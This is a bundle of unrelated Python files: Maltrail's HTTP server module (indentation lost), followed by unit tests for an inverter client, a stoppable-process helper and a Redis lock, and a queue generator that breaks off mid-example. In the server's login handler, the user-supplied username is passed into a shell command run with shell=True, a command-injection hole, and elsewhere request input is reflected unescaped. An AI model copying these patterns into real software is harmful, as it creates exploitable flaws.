httpd.py
#!/usr/bin/env python
"""
Copyright (c) 2014-2019 Maltrail developers (https://github.com/stamparm/maltrail/)
See the file 'LICENSE' for copying permission
"""
import BaseHTTPServer
import cStringIO
import datetime
import httplib
import glob
import gzip
import hashlib
import io
import json
import mimetypes
import os
import re
import socket
import SocketServer
import subprocess
import threading
import time
import traceback
import urllib
import urlparse
from core.addr import addr_to_int
from core.addr import int_to_addr
from core.addr import make_mask
from core.attribdict import AttribDict
from core.common import get_regex
from core.common import ipcat_lookup
from core.common import worst_asns
from core.enums import HTTP_HEADER
from core.settings import config
from core.settings import CONTENT_EXTENSIONS_EXCLUSIONS
from core.settings import DATE_FORMAT
from core.settings import DISABLED_CONTENT_EXTENSIONS
from core.settings import DISPOSED_NONCES
from core.settings import HTML_DIR
from core.settings import HTTP_TIME_FORMAT
from core.settings import MAX_NOFILE
from core.settings import NAME
from core.settings import PING_RESPONSE
from core.settings import SERVER_HEADER
from core.settings import SESSION_COOKIE_NAME
from core.settings import SESSION_COOKIE_FLAG_SAMESITE
from core.settings import SESSION_EXPIRATION_HOURS
from core.settings import SESSION_ID_LENGTH
from core.settings import SESSIONS
from core.settings import TRAILS_FILE
from core.settings import UNAUTHORIZED_SLEEP_TIME
from core.settings import VERSION
try:
# Reference: https://bugs.python.org/issue7980
# Reference: http://code-trick.com/python-bug-attribute-error-_strptime/
import _strptime
except ImportError:
pass
try:
import resource
resource.setrlimit(resource.RLIMIT_NOFILE, (MAX_NOFILE, MAX_NOFILE))
except:
pass
def start_httpd(address=None, port=None, join=False, pem=None):
"""
Starts HTTP server
"""
class ThreadingServer(SocketServer.ThreadingMixIn, BaseHTTPServer.HTTPServer):
def server_bind(self):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
BaseHTTPServer.HTTPServer.server_bind(self)
def finish_request(self, *args, **kwargs):
try:
BaseHTTPServer.HTTPServer.finish_request(self, *args, **kwargs)
except:
if config.SHOW_DEBUG:
traceback.print_exc()
class SSLThreadingServer(ThreadingServer):
def __init__(self, server_address, pem, HandlerClass):
import OpenSSL # python-openssl
ThreadingServer.__init__(self, server_address, HandlerClass)
ctx = OpenSSL.SSL.Context(OpenSSL.SSL.TLSv1_METHOD)
ctx.use_privatekey_file(pem)
ctx.use_certificate_file(pem)
self.socket = OpenSSL.SSL.Connection(ctx, socket.socket(self.address_family, self.socket_type))
self.server_bind()
self.server_activate()
def shutdown_request(self, request):
try:
request.shutdown()
except:
if config.SHOW_DEBUG:
traceback.print_exc()
class ReqHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(self):
path, query = self.path.split('?', 1) if '?' in self.path else (self.path, "")
params = {}
content = None
skip = False
if hasattr(self, "data"):
params.update(urlparse.parse_qs(self.data))
if query:
params.update(urlparse.parse_qs(query))
for key in params:
if params[key]:
params[key] = params[key][-1]
if path == '/':
path = "index.html"
path = path.strip('/')
extension = os.path.splitext(path)[-1].lower()
if hasattr(self, "_%s" % path):
content = getattr(self, "_%s" % path)(params)
else:
path = path.replace('/', os.path.sep)
path = os.path.abspath(os.path.join(HTML_DIR, path)).strip()
if not os.path.isfile(path) and os.path.isfile("%s.html" % path):
path = "%s.html" % path
if any((config.IP_ALIASES,)) and self.path.split('?')[0] == "/js/main.js":
content = open(path, "rb").read()
content = re.sub(r"\bvar IP_ALIASES =.+", "var IP_ALIASES = {%s};" % ", ".join('"%s": "%s"' % (_.split(':', 1)[0].strip(), _.split(':', 1)[-1].strip()) for _ in config.IP_ALIASES), content)
self.send_response(httplib.OK)
elif ".." not in os.path.relpath(path, HTML_DIR) and os.path.isfile(path) and (extension not in DISABLED_CONTENT_EXTENSIONS or os.path.split(path)[-1] in CONTENT_EXTENSIONS_EXCLUSIONS):
mtime = time.gmtime(os.path.getmtime(path))
if_modified_since = self.headers.get(HTTP_HEADER.IF_MODIFIED_SINCE)
if if_modified_since and extension not in (".htm", ".html"):
if_modified_since = [_ for _ in if_modified_since.split(';') if _.upper().endswith("GMT")][0]
if time.mktime(mtime) <= time.mktime(time.strptime(if_modified_since, HTTP_TIME_FORMAT)):
self.send_response(httplib.NOT_MODIFIED)
self.send_header(HTTP_HEADER.CONNECTION, "close")
skip = True
if not skip:
content = open(path, "rb").read()
last_modified = time.strftime(HTTP_TIME_FORMAT, mtime)
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, mimetypes.guess_type(path)[0] or "application/octet-stream")
self.send_header(HTTP_HEADER.LAST_MODIFIED, last_modified)
self.send_header(HTTP_HEADER.CONTENT_SECURITY_POLICY, "default-src 'none'; style-src 'self' 'unsafe-inline'; img-src 'self'; "+
"script-src 'self' 'unsafe-eval' https://stat.ripe.net; connect-src 'self'; form-action 'self'; "+
"font-src 'self'; frame-src *; worker-src 'self'; block-all-mixed-content;")
if extension not in (".htm", ".html"):
self.send_header(HTTP_HEADER.EXPIRES, "Sun, 17-Jan-2038 19:14:07 GMT") # Reference: http://blog.httpwatch.com/2007/12/10/two-simple-rules-for-http-caching/
self.send_header(HTTP_HEADER.CACHE_CONTROL, "max-age=3600, must-revalidate") # Reference: http://stackoverflow.com/a/5084555
else:
self.send_header(HTTP_HEADER.CACHE_CONTROL, "no-cache")
else:
self.send_response(httplib.NOT_FOUND)
self.send_header(HTTP_HEADER.CONNECTION, "close")
content = '<!DOCTYPE html><html lang="en"><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL %s was not found on this server.</p></body></html>' % self.path.split('?')[0]
if content is not None:
for match in re.finditer(r"<\!(\w+)\!>", content):
name = match.group(1)
_ = getattr(self, "_%s" % name.lower(), None)
if _:
content = self._format(content, **{ name: _() })
if "gzip" in self.headers.getheader(HTTP_HEADER.ACCEPT_ENCODING, ""):
self.send_header(HTTP_HEADER.CONTENT_ENCODING, "gzip")
_ = cStringIO.StringIO()
compress = gzip.GzipFile("", "w+b", 9, _)
compress._stream = _
compress.write(content)
compress.flush()
compress.close()
content = compress._stream.getvalue()
self.send_header(HTTP_HEADER.CONTENT_LENGTH, str(len(content)))
self.end_headers()
if content:
self.wfile.write(content)
self.wfile.flush()
self.wfile.close()
def do_POST(self):
length = self.headers.getheader(HTTP_HEADER.CONTENT_LENGTH)
data = self.rfile.read(int(length))
data = urllib.unquote_plus(data)
self.data = data
self.do_GET()
def get_session(self):
retval = None
cookie = self.headers.get(HTTP_HEADER.COOKIE)
if cookie:
match = re.search(r"%s\s*=\s*([^;]+)" % SESSION_COOKIE_NAME, cookie)
if match:
session = match.group(1)
if session in SESSIONS:
if SESSIONS[session].client_ip != self.client_address[0]:
pass
elif SESSIONS[session].expiration > time.time():
retval = SESSIONS[session]
else:
del SESSIONS[session]
return retval
def delete_session(self):
cookie = self.headers.get(HTTP_HEADER.COOKIE)
if cookie:
match = re.search(r"%s=(.+)" % SESSION_COOKIE_NAME, cookie)
if match:
session = match.group(1)
if session in SESSIONS:
del SESSIONS[session]
def version_string(self):
return SERVER_HEADER
def end_headers(self):
if not hasattr(self, "_headers_ended"):
BaseHTTPServer.BaseHTTPRequestHandler.end_headers(self)
self._headers_ended = True
def log_message(self, format, *args):
return
def finish(self):
try:
BaseHTTPServer.BaseHTTPRequestHandler.finish(self)
except:
if config.SHOW_DEBUG:
traceback.print_exc()
def _version(self):
return VERSION
def _format(self, content, **params):
if content:
for key, value in params.items():
content = content.replace("<!%s!>" % key, value)
return content
def _login(self, params):
valid = False
if params.get("username") and params.get("hash") and params.get("nonce"):
if params.get("nonce") not in DISPOSED_NONCES:
DISPOSED_NONCES.add(params.get("nonce"))
for entry in (config.USERS or []):
entry = re.sub(r"\s", "", entry)
username, stored_hash, uid, netfilter = entry.split(':')
if username == params.get("username"):
try:
if params.get("hash") == hashlib.sha256(stored_hash.strip() + params.get("nonce")).hexdigest():
valid = True
break
except:
if config.SHOW_DEBUG:
traceback.print_exc()
if valid:
session_id = os.urandom(SESSION_ID_LENGTH).encode("hex")
expiration = time.time() + 3600 * SESSION_EXPIRATION_HOURS
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
cookie = "%s=%s; expires=%s; path=/; HttpOnly" % (SESSION_COOKIE_NAME, session_id, time.strftime(HTTP_TIME_FORMAT, time.gmtime(expiration)))
if config.USE_SSL:
cookie += "; Secure"
if SESSION_COOKIE_FLAG_SAMESITE:
cookie += "; SameSite=strict"
self.send_header(HTTP_HEADER.SET_COOKIE, cookie)
if netfilter in ("", "0.0.0.0/0"):
netfilters = None
else:
addresses = set()
netmasks = set()
for item in set(re.split(r"[;,]", netfilter)):
item = item.strip()
if '/' in item:
_ = item.split('/')[-1]
if _.isdigit() and int(_) >= 16:
lower = addr_to_int(item.split('/')[0])
mask = make_mask(int(_))
upper = lower | (0xffffffff ^ mask)
while lower <= upper:
addresses.add(int_to_addr(lower))
lower += 1
else:
netmasks.add(item)
elif '-' in item:
_ = item.split('-')
lower, upper = addr_to_int(_[0]), addr_to_int(_[1])
while lower <= upper:
addresses.add(int_to_addr(lower))
lower += 1
elif re.search(r"\d+\.\d+\.\d+\.\d+", item):
addresses.add(item)
netfilters = netmasks
if addresses:
netfilters.add(get_regex(addresses))
SESSIONS[session_id] = AttribDict({"username": username, "uid": uid, "netfilters": netfilters, "expiration": expiration, "client_ip": self.client_address[0]})
else:
time.sleep(UNAUTHORIZED_SLEEP_TIME)
self.send_response(httplib.UNAUTHORIZED)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
content = "Login %s" % ("success" if valid else "failed")
if not subprocess.mswindows:
try:
subprocess.check_output("logger -p auth.info -t \"%s[%d]\" \"%s password for %s from %s port %s\"" % (NAME.lower(), os.getpid(), "Accepted" if valid else "Failed", params.get("username"), self.client_address[0], self.client_address[1]), stderr=subprocess.STDOUT, shell=True)
except Exception:
if config.SHOW_DEBUG:
traceback.print_exc()
return content
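        # Illustrative sketch of the client side of this login exchange: the client
        # combines the per-user hash stored in config.USERS (entry format
        # username:hash:uid:netfilter) with a fresh nonce, so that hash is never sent
        # directly. How the client obtains the stored hash is an assumption here, not
        # part of this module:
        #
        #     nonce = os.urandom(8).encode("hex")
        #     login_hash = hashlib.sha256(stored_hash + nonce).hexdigest()
        #     # POST parameters: username=<username>&hash=<login_hash>&nonce=<nonce>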
def _logout(self, params):
self.delete_session()
self.send_response(httplib.FOUND)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.LOCATION, "/")
def _whoami(self, params):
session = self.get_session()
username = session.username if session else ""
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
return username
def _check_ip(self, params):
session = self.get_session()
if session is None:
self.send_response(httplib.UNAUTHORIZED)
self.send_header(HTTP_HEADER.CONNECTION, "close")
return None
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
try:
result_worst = worst_asns(params.get("address"))
if result_worst:
result_ipcat = result_worst
else:
_ = (ipcat_lookup(params.get("address")) or "").lower().split(' ')
result_ipcat = _[1] if _[0] == 'the' else _[0]
return ("%s" if not params.get("callback") else "%s(%%s)" % params.get("callback")) % json.dumps({"ipcat": result_ipcat, "worst_asns": str(result_worst is not None).lower()})
except:
if config.SHOW_DEBUG:
traceback.print_exc()
def _trails(self, params):
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
return open(TRAILS_FILE, "rb").read()
def _ping(self, params):
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
return PING_RESPONSE
def _events(self, params):
session = self.get_session()
if session is None:
self.send_response(httplib.UNAUTHORIZED)
self.send_header(HTTP_HEADER.CONNECTION, "close")
return None
start, end, size, total = None, None, -1, None
content = None
log_exists = False
dates = params.get("date", "")
if ".." in dates:
pass
elif '_' not in dates:
try:
date = datetime.datetime.strptime(dates, "%Y-%m-%d").strftime("%Y-%m-%d")
event_log_path = os.path.join(config.LOG_DIR, "%s.log" % date)
if os.path.exists(event_log_path):
range_handle = open(event_log_path, "rb")
log_exists = True
except ValueError:
print "[!] invalid date format in request"
log_exists = False
else:
logs_data = ""
date_interval = dates.split("_", 1)
try:
start_date = datetime.datetime.strptime(date_interval[0], "%Y-%m-%d").date()
end_date = datetime.datetime.strptime(date_interval[1], "%Y-%m-%d").date()
for i in xrange(int((end_date - start_date).days) + 1):
date = start_date + datetime.timedelta(i)
event_log_path = os.path.join(config.LOG_DIR, "%s.log" % date.strftime("%Y-%m-%d"))
if os.path.exists(event_log_path):
log_handle = open(event_log_path, "rb")
logs_data += log_handle.read()
log_handle.close()
range_handle = io.BytesIO(logs_data)
log_exists = True
except ValueError:
print "[!] invalid date format in request"
log_exists = False
if log_exists:
range_handle.seek(0, 2)
total = range_handle.tell()
range_handle.seek(0)
if self.headers.get(HTTP_HEADER.RANGE):
match = re.search(r"bytes=(\d+)-(\d+)", self.headers[HTTP_HEADER.RANGE])
if match:
start, end = int(match.group(1)), int(match.group(2))
max_size = end - start + 1
end = min(total - 1, end)
size = end - start + 1
if start == 0 or not session.range_handle:
session.range_handle = range_handle
if session.netfilters is None:
session.range_handle.seek(start)
self.send_response(httplib.PARTIAL_CONTENT)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
self.send_header(HTTP_HEADER.CONTENT_RANGE, "bytes %d-%d/%d" % (start, end, total))
content = session.range_handle.read(size)
else:
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
buffer, addresses, netmasks, regex = cStringIO.StringIO(), set(), [], ""
for netfilter in session.netfilters:
if not netfilter:
continue
if '/' in netfilter:
netmasks.append(netfilter)
elif re.search(r"\A[\d.]+\Z", netfilter):
addresses.add(netfilter)
elif '\.' in netfilter:
regex = r"\b(%s)\b" % netfilter
else:
print "[!] invalid network filter '%s'" % netfilter
return
for line in session.range_handle:
display = False
ip = None
if regex:
match = re.search(regex, line)
if match:
ip = match.group(1)
display = True
if not display and (addresses or netmasks):
for match in re.finditer(r"\b(\d+\.\d+\.\d+\.\d+)\b", line):
if not display:
ip = match.group(1)
else:
break
if ip in addresses:
display = True
break
elif netmasks:
for _ in netmasks:
prefix, mask = _.split('/')
if addr_to_int(ip) & make_mask(int(mask)) == addr_to_int(prefix):
addresses.add(ip)
display = True
break
if display:
if ",%s" % ip in line or "%s," % ip in line:
line = re.sub(r" ([\d.,]+,)?%s(,[\d.,]+)? " % re.escape(ip), " %s " % ip, line)
buffer.write(line)
if buffer.tell() >= max_size:
break
content = buffer.getvalue()
end = start + len(content) - 1
self.send_header(HTTP_HEADER.CONTENT_RANGE, "bytes %d-%d/%d" % (start, end, end + 1 + max_size * (len(content) >= max_size)))
if len(content) < max_size:
session.range_handle.close()
session.range_handle = None
if size == -1:
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
self.end_headers()
with range_handle as f:
while True:
data = f.read(io.DEFAULT_BUFFER_SIZE)
if not data:
break
else:
self.wfile.write(data)
else:
self.send_response(httplib.OK) # instead of httplib.NO_CONTENT (compatibility reasons)
self.send_header(HTTP_HEADER.CONNECTION, "close")
if self.headers.get(HTTP_HEADER.RANGE):
self.send_header(HTTP_HEADER.CONTENT_RANGE, "bytes 0-0/0")
return content
def _counts(self, params):
counts = {}
session = self.get_session()
if session is None:
self.send_response(httplib.UNAUTHORIZED)
self.send_header(HTTP_HEADER.CONNECTION, "close")
return None
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "application/json")
match = re.search(r"\d+\-\d+\-\d+", params.get("from", ""))
if match:
min_ = datetime.datetime.strptime(match.group(0), DATE_FORMAT)
else:
min_ = datetime.datetime.fromtimestamp(0)
match = re.search(r"\d+\-\d+\-\d+", params.get("to", ""))
if match:
max_ = datetime.datetime.strptime(match.group(0), DATE_FORMAT)
else:
max_ = datetime.datetime.now()
min_ = min_.replace(hour=0, minute=0, second=0, microsecond=0)
max_ = max_.replace(hour=23, minute=59, second=59, microsecond=999999)
for filepath in sorted(glob.glob(os.path.join(config.LOG_DIR, "*.log"))):
filename = os.path.basename(filepath)
if not re.search(r"\A\d{4}-\d{2}-\d{2}\.log\Z", filename):
continue
try:
current = datetime.datetime.strptime(os.path.splitext(filename)[0], DATE_FORMAT)
except:
if config.SHOW_DEBUG:
traceback.print_exc()
else:
if min_ <= current <= max_:
timestamp = int(time.mktime(current.timetuple()))
size = os.path.getsize(filepath)
with open(filepath, "rb") as f:
content = f.read(io.DEFAULT_BUFFER_SIZE)
if size >= io.DEFAULT_BUFFER_SIZE:
total = 1.0 * content.count('\n') * size / io.DEFAULT_BUFFER_SIZE
counts[timestamp] = int(round(total / 100) * 100)
else:
counts[timestamp] = content.count('\n')
return json.dumps(counts)
class SSLReqHandler(ReqHandler):
def setup(self):
self.connection = self.request
self.rfile = socket._fileobject(self.request, "rb", self.rbufsize)
self.wfile = socket._fileobject(self.request, "wb", self.wbufsize)
try:
if pem:
server = SSLThreadingServer((address or '', int(port) if str(port or "").isdigit() else 0), pem, SSLReqHandler)
else:
server = ThreadingServer((address or '', int(port) if str(port or "").isdigit() else 0), ReqHandler)
except Exception as ex:
if "Address already in use" in str(ex):
exit("[!] another instance already running")
elif "Name or service not known" in str(ex):
exit("[!] invalid configuration value for 'HTTP_ADDRESS' ('%s')" % config.HTTP_ADDRESS)
elif "Cannot assign requested address" in str(ex):
exit("[!] can't use configuration value for 'HTTP_ADDRESS' ('%s')" % config.HTTP_ADDRESS)
else:
raise
print "[i] starting HTTP%s server at 'http%s://%s:%d/'" % ('S' if pem else "", 's' if pem else "", server.server_address[0], server.server_address[1])
print "[o] running..."
if join:
server.serve_forever()
else:
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
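# Illustrative usage sketch (address and port are placeholders, not project
# defaults): run the server in the foreground, optionally pointing at a PEM
# file to enable HTTPS.
#
#     start_httpd(address="127.0.0.1", port=8338, join=True)
#     start_httpd(address="0.0.0.0", port=8338, join=True, pem="/path/to/server.pem")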
test_inverter.py
"""Test cases for inverter.py."""
from io import BytesIO
from queue import Queue
from socket import socketpair, create_connection
from threading import Thread
from time import sleep
from unittest import TestCase
from samil.inverter import calculate_checksum, construct_message, Inverter, InverterEOFError, InverterFinder, \
InverterNotFoundError, read_message, KeepAliveInverter
class MessageTestCase(TestCase):
"""Test message construction/destruction functions."""
def test_checksum(self):
"""Tests checksum calculation."""
message = bytes.fromhex("55 aa 01 89 00 00 04 55 0c 00 00")
checksum = bytes.fromhex("01 ee")
self.assertEqual(checksum, calculate_checksum(message))
def test_construct(self):
"""Tests message construction."""
identifier = b'\x06\x01\x02'
payload = b'\x10\x10'
expect = bytes.fromhex("55 aa 06 01 02 00 02 10 10 01 2a")
self.assertEqual(expect, construct_message(identifier, payload))
def test_read(self):
"""Tests read_message function."""
f = BytesIO(bytes.fromhex("55 aa 06 01 02 00 02 10 10 01 2a"))
ident, payload = read_message(f)
self.assertEqual(b"\x06\x01\x02", ident)
self.assertEqual(b"\x10\x10", payload)
message = b"\x55\xaa\x00\x01\x02\x00\x00\x01\x02" # Sample inverter message
class InverterConnectionTestCase(TestCase):
"""Test low-level send/receive inverter messages over a socket connection.
These test cases exist mainly because the sockets might behave differently
    on Windows.
"""
def setUp(self) -> None:
"""Creates socket pair for local (app) and remote (fake inverter) side."""
local_sock, remote_sock = socketpair() # We apparently can't use family=AF_INET on Linux
local_sock.settimeout(1.0)
remote_sock.settimeout(1.0)
self.inverter = Inverter(local_sock, None)
# This sock mimics the actual inverter, i.e. the remote side of the
# connection. Send messages on it to mimic the actual inverter sending
# messages to the Inverter class.
self.sock = remote_sock
def tearDown(self) -> None:
"""Closes the sockets to prevent warnings."""
self.inverter.sock.close()
self.sock.close()
def test_eof_on_send(self):
"""Tests if exception is raised on sending when connection is closed."""
self.sock.close() # Mimic inverter closed connection
with self.assertRaises((BrokenPipeError, ConnectionAbortedError)):
self.inverter.send(b"\x00\x01\x02", b"")
            # On Windows the error is only raised on the second send attempt, and it
            # is a ConnectionAbortedError instead of a BrokenPipeError
self.inverter.send(b"\x00\x01\x02", b"")
def test_eof_on_recv(self):
"""Tests if exception is raised for closed connection when receiving."""
self.sock.close() # Mimic inverter closed connection
with self.assertRaises(InverterEOFError):
self.inverter.receive()
def test_multiple_messages_received_at_once(self):
"""Multiple messages might arrive at once for TCP sockets."""
# Send 2 messages
self.sock.send(message + message)
# Receive them back
ident, payload = self.inverter.receive()
self.assertEqual(b"\x00\x01\x02", ident)
self.assertEqual(b"", payload)
ident, payload = self.inverter.receive()
self.assertEqual(b"\x00\x01\x02", ident)
self.assertEqual(b"", payload)
def test_chopped_message(self):
"""Messages might arrive chopped for TCP sockets."""
queue = Queue()
# Receive the message in a separate thread, because it blocks
thread = Thread(target=lambda q: q.put(self.inverter.receive()), args=(queue,))
thread.start()
self.sock.send(message[0:1]) # Send some message parts
sleep(0.01)
self.sock.send(message[1:3])
sleep(0.01)
self.sock.send(message[3:7])
sleep(0.01)
self.sock.send(message[7:])
thread.join()
# Check result
ident, payload = queue.get(timeout=1.0)
self.assertEqual(b"\x00\x01\x02", ident)
self.assertEqual(b"", payload)
def test_send(self):
"""Tests whether a message from the app will arrive at the receiver."""
self.inverter.send(b"\x00\x01\x02", b"")
received_message = self.sock.recv(4096)
self.assertEqual(message, received_message)
def test_disconnect_multiple(self):
"""Tests if disconnect can be called multiple times."""
self.inverter.disconnect()
self.inverter.disconnect() # Should not raise exception
def test_disconnect_closed(self):
"""Tests if disconnect can be called on a closed socket."""
self.sock.close()
self.inverter.sock.close()
self.inverter.sock_file.close()
self.inverter.disconnect() # Should not raise exception
class InverterFinderTestCase(TestCase):
def test_inverter_not_found(self):
"""Tests if InverterNotFoundError is raised."""
with InverterFinder() as finder:
with self.assertRaises(InverterNotFoundError):
finder.find_inverter(advertisements=2, interval=0.01)
def test_new_connection(self):
"""Tests if a new connection is returned."""
with InverterFinder() as finder:
sock1 = create_connection(('127.0.0.1', 1200))
sock2, addr = finder.find_inverter()
# Test if the 2 sockets are paired
sock2.send(b"\x12")
self.assertEqual(b"\x12", sock1.recv(1))
sock1.close()
sock2.close()
def test_open_with_retries_exception(self):
"""Tests if OSError is thrown after all retries have failed."""
port_blocker = InverterFinder()
port_blocker.open()
with self.assertRaises(OSError):
finder = InverterFinder()
finder.open_with_retries(retries=2, period=0.01)
port_blocker.close()
def test_open_with_retries(self):
"""Tests if a retry happens when port is bound."""
# Bind port
port_blocker = InverterFinder()
port_blocker.open()
# Try binding port using retry function in separate thread
def try_bind(q: Queue):
finder = InverterFinder()
finder.open_with_retries(retries=10, period=0.01)
finder.close()
# If bind failed, an exception should've been thrown by now
# I assume the bind has succeeded here
q.put(True)
queue = Queue()
thread = Thread(target=try_bind, args=(queue,))
thread.start()
# Unbind port
sleep(0.01)
port_blocker.close()
# Check if bind succeeded
thread.join()
succeeded = queue.get(timeout=1.0)
self.assertTrue(succeeded)
class KeepAliveInverterTestCase(TestCase):
"""Tests for KeepAliveInverter class."""
def setUp(self) -> None:
"""Creates socket pair for local (app) and remote ('real' inverter) side."""
local_sock, remote_sock = socketpair()
local_sock.settimeout(1.0)
remote_sock.settimeout(1.0)
self.inverter = KeepAliveInverter(local_sock, None, keep_alive=0.01)
self.sock = remote_sock
def tearDown(self) -> None:
"""Closes the sockets to prevent warnings."""
self.inverter.disconnect()
self.sock.close()
def test_keep_alive_sent(self):
"""Tests if a keep-alive message gets send periodically."""
# Receive keep-alive message
msg = self.sock.recv(4096)
self.assertTrue(msg.startswith(b"\x55\xaa"))
# Send some arbitrary response
self.sock.send(bytes.fromhex("55 aa 01 02 02 00 00 01 04"))
# Receive another keep-alive message
msg = self.sock.recv(4096)
self.assertTrue(msg.startswith(b"\x55\xaa"))
# Send some arbitrary response
self.sock.send(bytes.fromhex("55 aa 01 02 02 00 00 01 04"))
def test_keep_alive_cancelled(self):
"""Tests if keep-alive messages are cancelled when other messages are sent."""
        sleep(0.005)  # Wait part of the keep-alive period before sending our own message
self.inverter.send(b"\x01\x02\x03", b"") # Send something arbitrary
self.sock.recv(4096) # Retrieve the sent message
sleep(0.008) # Wait until just before the next keep-alive is supposed to happen
# Check that no message was sent
self.sock.setblocking(False)
with self.assertRaises(BlockingIOError):
self.sock.recv(4096)
def test_disconnect(self):
"""Tests if the keep-alive messages will stop cleanly."""
self.inverter.disconnect()
sleep(0.02)
stoppable_test.py
import os
import unittest
from signal import SIGINT
from time import sleep
from multiprocessing import Process
from rocky.process import stoppable
def nice_process():
with stoppable() as s:
while s.check_stop():
sleep(0.01)
def nasty_process():
with stoppable() as s:
while True:
sleep(0.01)
class Test(unittest.TestCase):
def test_nice_process_is_stopped_after_one_signal(self):
p = Process(target=nice_process)
try:
p.start()
sleep(0.01)
os.kill(p.pid, SIGINT)
p.join(1)
self.assertFalse(p.is_alive())
finally:
p.terminate()
def test_nasty_process_is_killed_on_fifth_signals(self):
if os.environ.get('TRAVIS'):
# This test fails intermittently in travis, probably due
# to some race condition between the processes.
return
p = Process(target=nasty_process)
try:
p.start()
for _ in range(4):
sleep(0.01)
os.kill(p.pid, SIGINT)
self.assertTrue(p.is_alive())
os.kill(p.pid, SIGINT)
p.join(1)
self.assertFalse(p.is_alive())
finally:
p.terminate()
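# The behaviour these tests rely on, as a minimal sketch (illustrative only,
# not rocky.process's implementation): stoppable() installs a SIGINT handler,
# check_stop() keeps returning True until a stop has been requested, and after
# several ignored signals (the fifth here) the handler terminates the process.
import signal
import sys
from contextlib import contextmanager

@contextmanager
def _sketch_stoppable(max_signals=5):
    state = {"signals": 0}

    class _Handle:
        def check_stop(self):
            # True while no stop has been requested yet
            return state["signals"] == 0

    def _on_sigint(signum, frame):
        state["signals"] += 1
        if state["signals"] >= max_signals:
            sys.exit(1)  # give up on a process that keeps ignoring check_stop()

    previous = signal.signal(SIGINT, _on_sigint)
    try:
        yield _Handle()
    finally:
        signal.signal(SIGINT, previous)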
test_lock.py
# -*- coding: utf-8 -*-
"""
Created on Sat Feb 28 20:23:09 2015
@author: Eike
"""
from threading import Thread
import time
import tsdb
import redis
TESTDB=9
POOL = redis.ConnectionPool(host='localhost', port=6379, db=TESTDB)
def test_lock_twice_acquire_lt_lock_timeout():
lockname = 'a_key'
conn = redis.Redis(connection_pool=POOL)
identifier = tsdb.acquire_lock_with_timeout(
conn=conn,
lockname=lockname,
acquire_timeout=10,
lock_timeout=3,
)
assert identifier is not False
result = tsdb.acquire_lock_with_timeout(
conn=conn,
lockname=lockname,
acquire_timeout=2,
lock_timeout=2,
)
    assert result is False
tsdb.release_lock(conn, lockname, identifier)
def test_lock_twice_acquire_gt_lock_timeout():
lockname = 'a_key'
conn = redis.Redis(connection_pool=POOL)
identifier = tsdb.acquire_lock_with_timeout(
conn=conn,
lockname=lockname,
acquire_timeout=10,
lock_timeout=2,
)
assert identifier is not False
identifier2 = tsdb.acquire_lock_with_timeout(
conn=conn,
lockname=lockname,
acquire_timeout=3,
lock_timeout=2,
)
assert identifier2 is not False
assert identifier != identifier2
tsdb.release_lock(conn, lockname, identifier2)
def test_lock_twice_and_release():
def acquire(acquire_timeout):
        identifier2 = tsdb.acquire_lock_with_timeout(
conn=conn,
lockname=lockname,
acquire_timeout=acquire_timeout,
lock_timeout=5,
)
        assert identifier2 is not False
lockname = 'a_key'
conn = redis.Redis(connection_pool=POOL)
identifier = tsdb.acquire_lock_with_timeout(
conn=conn,
lockname=lockname,
acquire_timeout=10,
lock_timeout=20,
)
assert identifier is not False
t = Thread(target=acquire, args=(20, ))
t.start()
time.sleep(1)
    tsdb.release_lock(conn, lockname, identifier)
    t.join()
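# The tests above assume tsdb.acquire_lock_with_timeout returns a unique
# identifier on success and False once acquire_timeout expires, and that a
# held lock auto-expires after lock_timeout seconds. A minimal sketch of that
# pattern (the classic SET-NX-with-expiry recipe; key naming and details are
# assumptions, not necessarily tsdb's implementation):
import uuid

def _sketch_acquire_lock_with_timeout(conn, lockname, acquire_timeout=10, lock_timeout=10):
    identifier = str(uuid.uuid4())
    deadline = time.time() + acquire_timeout
    while time.time() < deadline:
        # Succeeds only if nobody currently holds the lock; EX makes it auto-expire
        if conn.set('lock:' + lockname, identifier, nx=True, ex=int(lock_timeout)):
            return identifier
        time.sleep(0.001)
    return False

def _sketch_release_lock(conn, lockname, identifier):
    # Release only if we still own the lock (it may have expired and been re-acquired)
    key = 'lock:' + lockname
    if conn.get(key) == identifier.encode():
        conn.delete(key)
        return True
    return False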
genqueue.py
# genqueue.py
#
# Generate a sequence of items that are put onto a queue
def consume_queue(thequeue):
while True:
item = thequeue.get()
if item is StopIteration:
break
yield item
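# Note (illustrative): the StopIteration class works as an end-of-stream marker
# because it is compared by identity, but a dedicated sentinel object makes the
# intent clearer and cannot clash with values that legitimately flow through
# the queue. A minimal variant of the same idea:
_DONE = object()

def consume_queue_with_sentinel(thequeue, sentinel=_DONE):
    while True:
        item = thequeue.get()
        if item is sentinel:
            break
        yield item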
# Example
if __name__ == '__main__':
import queue,threading
def consumer(q):
for item in consume_queue(q):
print("Consumed", item)
print("done")
in_q = queue.Queue()
con_thr = threading.Thread(target=consumer,args=(in_q,))
